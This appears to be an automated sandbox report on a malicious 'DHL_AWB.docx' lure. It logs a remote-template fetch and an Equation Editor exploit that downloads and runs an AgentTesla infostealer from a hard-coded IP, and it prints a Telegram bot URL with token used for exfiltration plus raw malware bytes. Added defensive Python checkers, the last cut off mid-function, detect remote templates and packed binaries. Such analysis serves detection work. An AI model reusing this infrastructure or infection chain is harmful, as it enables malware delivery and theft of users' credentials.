b5 00 00 f8 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 09 00 00 06 00 2a 1b 30 03 00 d1 00 00 00 01 00 00 11 00 03 8c 01 00 00 1b 14 fe 03 0a 06 39 bf 00 00 00 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 17 00 00 0a 73 18 00 00 0a 0b 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 19 00 00 0a 0c 2b 5d 08 6f 1a 00 00 0a 74 16 00 00 01 0d 00 0f 01 fe 16 01 00 00 1b 6f 1b 00 00 0a 09 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 13 04 11 04 14 28 1f 00 00 0a 13 06 11 06 2c 14 00 11 04 03 8c 01 00 00 1b 14 6f 20 00 00 0a 13 05 00 2b 05 00 14 13 05 00 07 11 05 6f 21 00 00 0a 00 00 08 6f 22 00 00 0a 2d 9b de 15 08 75 18 00 00 01 13 07 11 07 2c 08 11 07 6f 23 00 00 0a 00 dc 02 7b 02 00 00 04 6f 24 00 00 0a 07 6f 25 00 00 0a 6f 26 00 00 0a 26 00 2a 00 00 00 01 10 00 00 02 00 3a 00 69 a3 00 15 00 00 00 00 13 30 02 00 32 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 6f 27 00 00 0a 6f 17 00 00 0a 16 30 03
Source: global traffic HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com= equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exe
Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exehhC:
Source: EQNEDT32.EXE, 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exej
Source: shp on 198.23.207.54.url.0.dr String found in binary or memory: http://198.23.207.54/shp/
Source: doc_200.doc.url.0.dr String found in binary or memory: http://198.23.207.54/shp/doc_200.doc
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ADD09414-4C0B-48D8-B1C9-FBE697880796}.tmp
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: global traffic HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive

System Summary

Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\Public\vbc.exe Code function: 10_2_00389118 10_2_00389118
Source: C:\Users\Public\vbc.exe Code function: 10_2_00386638 10_2_00386638
Source: C:\Users\Public\vbc.exe Code function: 10_2_00382790 10_2_00382790
Source: C:\Users\Public\vbc.exe Code function: 10_2_00389108 10_2_00389108
Source: C:\Users\Public\vbc.exe Code function: 10_2_0038962F 10_2_0038962F
Source: C:\Users\Public\vbc.exe Code function: 10_2_0038277B 10_2_0038277B
Source: C:\Users\Public\vbc.exe Code function: 10_2_00700960 10_2_00700960
Source: C:\Users\Public\vbc.exe Code function: 10_2_00720048 10_2_00720048
Source: C:\Users\Public\vbc.exe Code function: 10_2_003800C8 10_2_003800C8
Source: C:\Users\Public\vbc.exe Code function: 10_2_00380F32 10_2_00380F32
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: vbc[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHL_AWB.docx Virustotal: Detection: 22%
Source: DHL_AWB.docx ReversingLabs: Detection: 28%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: DHL_AWB.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\DHL_AWB.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$HL_AWB.docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR55AD.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOCX@16/25@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: DHL_AWB.docx Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: DHL_AWB.docx Initial sample: OLE zip file path = word/_rels/settings.xml.rels
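The two zip paths above are the static tell-tales of this sample: an embedded Excel object and a relationships part for settings.xml, which is where Word stores the attached-template link that the report later resolves to http://198.23.207.54/shp/doc_200.doc. The following check, an added example and not part of the Joe Sandbox report, opens a .docx as an OOXML package, lists every relationship with TargetMode="External", and flags remote attached templates and embedded objects. The relationship type (attachedTemplate) and the minimal constructed package are assumptions; the report only states that the URL was extracted from settings.xml.rels.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

PKG_REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")  # last one is a UNC path


@dataclass(frozen=True)
class ExternalRef:
    rels_part: str
    rel_type: str
    target: str


def external_relationships(docx: bytes) -> List[ExternalRef]:
    """Every relationship with TargetMode="External" in any .rels part of the package."""
    refs: List[ExternalRef] = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for name in sorted(zf.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(PKG_REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    refs.append(ExternalRef(name, rel.get("Type", ""), rel.get("Target", "")))
    return refs


def embedded_objects(docx: bytes) -> List[str]:
    """Objects embedded in the document body (word/embeddings/*), e.g. an OLE or OOXML payload."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        return sorted(n for n in zf.namelist() if n.startswith("word/embeddings/") and not n.endswith("/"))


def triage(docx: bytes) -> List[str]:
    """Human-readable findings; a remote attachedTemplate is fetched silently when the file opens."""
    findings: List[str] = []
    for ref in external_relationships(docx):
        remote = ref.target.lower().startswith(REMOTE_PREFIXES)
        if remote and ref.rel_type == ATTACHED_TEMPLATE:
            findings.append(f"REMOTE_TEMPLATE {ref.rels_part} -> {ref.target}")
        elif remote:
            findings.append(f"EXTERNAL_TARGET {ref.rels_part} -> {ref.target}")
    findings.extend(f"EMBEDDED_OBJECT {part}" for part in embedded_objects(docx))
    return findings


def build_sample_docx() -> bytes:
    """Constructed stand-in for DHL_AWB.docx containing only the parts the checks above read."""
    rels_ns = PKG_REL_NS[1:-1]
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{rels_ns}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        'Target="http://198.23.207.54/shp/doc_200.doc" TargetMode="External"/>'
        "</Relationships>"
    )
    document_rels = (
        f'<Relationships xmlns="{rels_ns}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" '
        'Target="settings.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/embeddings/Microsoft_Excel_Worksheet1.xlsx", b"PK\x03\x04 placeholder bytes")
    return buf.getvalue()


if __name__ == "__main__":
    for line in triage(build_sample_docx()):
        print(line)
```

Run it against a real file with `triage(open(path, "rb").read())`. An internal relationship (no TargetMode, or TargetMode="Internal") is never reported, so a clean document with a local template yields only the EMBEDDED_OBJECT lines, if any.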
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Users\Public\vbc.exe Code function: 10_2_00701281 pushfd ; ret 10_2_00701283
Source: C:\Users\Public\vbc.exe Code function: 10_2_00703B61 push ds; iretd 10_2_00703B69
Source: C:\Users\Public\vbc.exe Code function: 10_2_007210C0 push eax; retn 0062h 10_2_007210C1
Source: vbc[1].exe.9.dr Static PE information: 0xBA9E5D5F [Tue Mar 19 17:46:07 2069 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.827553581420892
Source: initial sample Static PE information: section name: .text entropy: 7.827553581420892
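Two of the static indicators above, a link timestamp of 0xBA9E5D5F that decodes to 2069 and a .text section with entropy close to 8, are cheap to reproduce outside the sandbox. The script below is an added example, not code from the Joe Sandbox report: it reads TimeDateStamp from the COFF header via e_lfanew, compares it with the date the analyst first saw the sample, and computes Shannon entropy for a section body. The 7.0 entropy cut-off and the minimal MZ/PE stub used as input are assumptions; the stub is not the dropped vbc.exe.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Optional

UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
PACKED_ENTROPY_THRESHOLD = 7.0  # assumed cut-off; compiled x86 code normally sits well below it


def read_pe_timestamp(image: bytes) -> Optional[int]:
    """Return IMAGE_FILE_HEADER.TimeDateStamp, or None if the buffer is not a PE image."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if e_lfanew + 24 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return stamp


def pe_timestamp_iso(stamp: int) -> str:
    """TimeDateStamp counts seconds since the Unix epoch; render it as ISO-8601 UTC."""
    return (UNIX_EPOCH + timedelta(seconds=stamp)).isoformat()


def timestamp_verdict(stamp: int, observed_iso: str, tolerance_days: int = 1) -> str:
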